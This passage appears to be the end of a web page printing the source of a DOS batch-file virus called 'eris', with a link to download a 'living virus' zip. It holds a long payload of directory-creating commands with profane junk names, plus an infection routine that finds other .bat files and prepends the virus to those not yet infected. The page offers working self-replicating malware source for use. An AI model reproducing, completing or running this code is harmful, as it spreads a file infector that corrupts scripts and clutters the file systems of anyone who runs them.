<br>md c:\bbshit>eris
<br>md c:\brbbc>eris
<br>md c:\shitrshit>eris
<br>md c:\shitrvn>eris
<br>md c:\rshitsc>eris
<br>md c:\shitwshit>eris
<br>md c:\shittr>eris
<br>md c:\shitshitrc>eris
<br>md c:\shitshitcr>eris
<br>md c:\shitshitrcv>eris
<br>md c:\shitrshitc>eris
<br>md c:\llshitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\zzctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrshitcr>eris
<br>md c:\rryrr>eris
<br>md c:\sscrcy>eris
<br>md c:\ttrcrshitv>eris
<br>md c:\uushitshit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrshit>eris
<br>md c:\hhvc>eris
<br>md c:\yyrshit>eris
<br>md c:\zczshitc>eris
<br>md c:\bbfuckhit>eris
<br>md c:\brbbc>eris
<br>md c:\fuckhitrfuckhit>eris
<br>md c:\fuckhitrvn>eris
<br>md c:\rfuckhitfuckc>eris
<br>md c:\fuckhitwfuckhit>eris
<br>md c:\fuckhittr>eris
<br>md c:\fuckhitfuckhitrc>eris
<br>md c:\fuckhitfuckhitcr>eris
<br>md c:\fuckhitfuckhitrcv>eris
<br>md c:\fuckhitrfuckhitc>eris
<br>md c:\llfuckhitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\zzctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrfuckhitcr>eris
<br>md c:\rryrr>eris
<br>md c:\fuckfuckcrcy>eris
<br>md c:\ttrcrfuckhitv>eris
<br>md c:\uufuckhitfuckhit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrfuckhit>eris
<br>md c:\hhvc>eris
<br>md c:\yyrfuckhit>eris
<br>md c:\zczfuckhitc>eris
<br>md c:\bbcunthit>eris
<br>md c:\brbbc>eris
<br>md c:\cunthitrcunthit>eris
<br>md c:\cunthitrvn>eris
<br>md c:\rcunthitcuntc>eris
<br>md c:\cunthitwcunthit>eris
<br>md c:\cunthittr>eris
<br>md c:\cunthitcunthitrc>eris
<br>md c:\cunthitcunthitcr>eris
<br>md c:\cunthitcunthitrcv>eris
<br>md c:\cunthitrcunthitc>eris
<br>md c:\llcunthitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\zzctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrcunthitcr>eris
<br>md c:\rryrr>eris
<br>md c:\cuntcuntcrcy>eris
<br>md c:\ttrcrcunthitv>eris
<br>md c:\uucunthitcunthit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrcunthit>eris
<br>md c:\hhvc>eris
<br>md c:\yyrcunthit>eris
<br>md c:\zczcunthitc>eris
<br>md c:\bbbhit>eris
<br>md c:\brbbc>eris
<br>md c:\bhitrbhit>eris
<br>md c:\bhitrvn>eris
<br>md c:\rbhitbc>eris
<br>md c:\bhitwbhit>eris
<br>md c:\bhittr>eris
<br>md c:\bhitbhitrc>eris
<br>md c:\bhitbhitcr>eris
<br>md c:\bhitbhitrcv>eris
<br>md c:\bhitrbhitc>eris
<br>md c:\llbhitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\zzctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrbhitcr>eris
<br>md c:\rryrr>eris
<br>md c:\bbcrcy>eris
<br>md c:\ttrcrbhitv>eris
<br>md c:\uubhitbhit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrbhit>eris
<br>md c:\hhvc>eris
<br>md c:\yyrbhit>eris
<br>md c:\zczbhitc>eris
<br>md c:\bbdf>eris
<br>md c:\bbbf>eris
<br>md c:\ccdg>eris
<br>md c:\ddvn>eris
<br>md c:\eesc>eris
<br>md c:\ffwef>eris
<br>md c:\ggtr>eris
<br>md c:\hherj>eris
<br>md c:\iiier>eris
<br>md c:\jjferv>eris
<br>md c:\kkrec>eris
<br>md c:\llererwe>eris
<br>md c:\mwertm>eris
<br>md c:\nnwerb>eris
<br>md c:\zzcwerv>eris
<br>md c:\ppere>eris
<br>md c:\qqrccr>eris
<br>md c:\rryr>eris
<br>md c:\ssfy>eris
<br>md c:\ttfv>eris
<br>md c:\uucdc>eris
<br>md c:\vvr>eris
<br>md c:\wwjc>eris
<br>md c:\hhvc>eris
<br>md c:\yyfc>eris
<br>md c:\zzhcc>eris
<br>md c:\bbef>eris
<br>md c:\brbbf>eris
<br>md c:\ccreg>eris
<br>md c:\eervn>eris
<br>md c:\reesc>eris
<br>md c:\ffwef>eris
<br>md c:\ggtr>eris
<br>md c:\hhekrj>eris
<br>md c:\iiiker>eris
<br>md c:\jjferkv>eris
<br>md c:\kkrekc>eris
<br>md c:\llekrerwe>eris
<br>md c:\mwertm>eris
<br>md c:\nnwterb>eris
<br>md c:\zzctwerv>eris
<br>md c:\pperre>eris
<br>md c:\qqreccr>eris
<br>md c:\rryrr>eris
<br>md c:\sserfy>eris
<br>md c:\ttrerefv>eris
<br>md c:\uuecec>eris
<br>md c:\vver>eris
<br>md c:\wwrjc>eris
<br>md c:\hhvc>eris
<br>md c:\yyrfc>eris
<br>md c:\zfzhcc>eris
<br>md c:\bbff>eris
<br>md c:\brbbf>eris
<br>md c:\ccrfg>eris
<br>md c:\ffrvn>eris
<br>md c:\rffsc>eris
<br>md c:\ffwff>eris
<br>md c:\ggtr>eris
<br>md c:\hhfkrj>eris
<br>md c:\iiikfr>eris
<br>md c:\jjffrkv>eris
<br>md c:\kkrfkc>eris
<br>md c:\llfkrfrwf>eris
<br>md c:\mwfrtm>eris
<br>md c:\nnwtfrb>eris
<br>md c:\zzctwfrv>eris
<br>md c:\ppfrrf>eris
<br>md c:\qqrfccr>eris
<br>md c:\rryrr>eris
<br>md c:\ssfrfy>eris
<br>md c:\ttrfrffv>eris
<br>md c:\uufcfc>eris
<br>md c:\vvfr>eris
<br>md c:\wwrjc>eris
<br>md c:\hhvc>eris
<br>md c:\yyrfc>eris
<br>md c:\zfzhcc>eris
<br>md c:\bbgg>eris
<br>md c:\brbbg>eris
<br>md c:\ccrgg>eris
<br>md c:\ggrvn>eris
<br>md c:\rggsc>eris
<br>md c:\ggwgg>eris
<br>md c:\ggtr>eris
<br>md c:\hhgkrj>eris
<br>md c:\iiikgr>eris
<br>md c:\zczkc>eris
<br>md c:\bbchit>eris
<br>md c:\brbbc>eris
<br>md c:\chitrchit>eris
<br>md c:\chitrvn>eris
<br>md c:\rchitcc>eris
<br>md c:\chitwchit>eris
<br>md c:\chittr>eris
<br>md c:\chitchitrc>eris
<br>md c:\chitchitcr>eris
<br>md c:\chitchitrcv>eris
<br>md c:\chitrchitc>eris
<br>md c:\llchitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\zzctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrchitcr>eris
<br>md c:\rryrr>eris
<br>md c:\cccrcy>eris
<br>md c:\ttrcrchitv>eris
<br>md c:\uuchitchit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrchit>eris
<br>md c:\hhvc>eris
<br>md c:\yyrchit>eris
<br>md c:\zczchitc>eris
<br>md c:\bbihit>eris
<br>md c:\brbbc>eris
<br>md c:\ihitrihit>eris
<br>md c:\ihitrvn>eris
<br>md c:\rihitic>eris
<br>md c:\ihitwihit>eris
<br>md c:\ihittr>eris
<br>md c:\ihitihitrc>eris
<br>md c:\ihitihitcr>eris
<br>md c:\ihitihitrcv>eris
<br>md c:\ihitrihitc>eris
<br>md c:\llihitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\zzctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrihitcr>eris
<br>md c:\rryrr>eris
<br>md c:\iicrcy>eris
<br>md c:\ttrcrihitv>eris
<br>md c:\uuihitihit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrihit>eris
<br>md c:\hhvc>eris
<br>md c:\yyrihit>eris
<br>md c:\zczihitc>eris
<br>md c:\bbczffhit>eris
<br>md c:\brbbc>eris
<br>md c:\czffhzffhit>eris
<br>md c:\czffhitrvn>eris
<br>md c:\rczffhitczffc>eris
<br>md c:\czffhitwczf>eris
<br>md c:\czffhittr>eris
<br>md c:\czffhzfitrc>eris
<br>md c:\czffhicr>eris
<br>md c:\czffhitczffrcv>eris
<br>md c:\czffhzffhitc>eris
<br>md c:\llczffhitrcrwc>eris
<br>md c:\mwcrtm>eris
<br>md c:\nnwtcrb>eris
<br>md c:\zzctwcrv>eris
<br>md c:\ppcrrc>eris
<br>md c:\qqrczffhitcr>eris
<br>md c:\rryrr>eris
<br>md c:\czffczffcrcy>eris
<br>md c:\ttrcrczffhitv>eris
<br>md c:\uuczffhitczffhit>eris
<br>md c:\vvcr>eris
<br>md c:\wwrczffhit>eris
<br>md c:\hhvc>eris
<br>md c:\yyrczffhit>eris
<br>md c:\zczczffhitc>eris
<br>del eris
<p>:: this is the payload, that creates 407 directories
<br>:: it does not take as long as you would expect
<p>:naeris
<br>set eris=
<br>goto erisend
<br>:erisvir
<br>shift%_eris%
<br>if '%2==' exit eris
<br>for %%a in (%2\*.bat %2*.bat) do call c:\_eris eris i %%a
<br>goto erisvir
<br>:erisi
<br>find "eris"<%3>nul
<br>if not errorlevel 1 goto erisj
<br>type c:\_eris.bat>eris$
<br>type %3>>eris$
<br>move eris$ %3>nul
<br>set eris#=%eris#%1
<br>if %eris#%==11111 exit
<br>:erisj
<br>set eris!=%eris!%1
<br>if %eris!%==1 exit
<br>:erisend
<p>:: this is the rest of the infection-routine
<p>=====[end code]=================================================================
<p><a href="04.zip">living virus</a>
</body>
</html>
